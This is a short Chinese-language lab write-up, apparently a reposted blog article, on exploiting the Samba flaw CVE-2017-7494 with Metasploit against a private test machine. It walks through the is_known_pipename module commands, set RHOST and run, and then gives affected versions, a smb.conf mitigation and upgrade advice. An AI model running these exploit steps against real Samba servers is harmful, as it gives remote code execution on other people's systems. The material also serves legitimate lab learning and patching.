CVE-2017-7494 简单利用
2019-09-10 11:14:57 Author: mp.weixin.qq.com(查看原文) 阅读量:87 收藏

漏洞简介

Samba是在Linux和UNIX系统上实现SMB协议的一个软件,不少IoT设备也使用了Samba。2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。2017年5月25日hdm给metasploit提交了该漏洞的exp。2017年5月25日openwrt发布了针对该漏洞的修复补丁,许多IoT设备同样受该漏洞影响。

环境准备
攻击机:kali                                    IP:192.168.123.26
靶   机:centos7                                 IP:192.168.123.23
服务:samba: 3.5.8

实施如下


Kali 配置相关攻击命令:


1、启动msfconsole,并选择使用is_known_pipename模块:

msf > use exploit/linux/samba/is_known_pipename

2、使用options选项,查看我们需要设置的参数并设置目标靶机ip:set RHOST 192.168.123.23

3、攻击:run

4、进入根目录并查看文件
cd /  ls

影响版本:
Samba:3.5     <4.6.4     <4.5.10     <4.4.14
这句话应该这么来理解,该漏洞影响Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。

修补建议:
1临时解决方案
如果不能马上升级,请使用缓解策略:通过在smb.conf的[global]节点下增加 nt pipe support = no选项,然后重新启动samba服务, 以此达到缓解该漏洞的效果。

官方解决方案
Samba官方已发布修复该漏洞的版本,相关用户可升级到最新版本。

补丁下载
下载地址:

https://www.samba.org/

※ 此实验仅供大家学习参考,其他违法行为本人不负任何责任,在此申明!


文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&amp;mid=2650457267&amp;idx=3&amp;sn=a0a860bf43c58670a5062a543713f67f&amp;chksm=83bba157b4cc2841d09d27e36a86dedce0b4da480f18dd93ec0483ec9d78864685656974795e#rd
如有侵权请联系:admin#unsafe.sh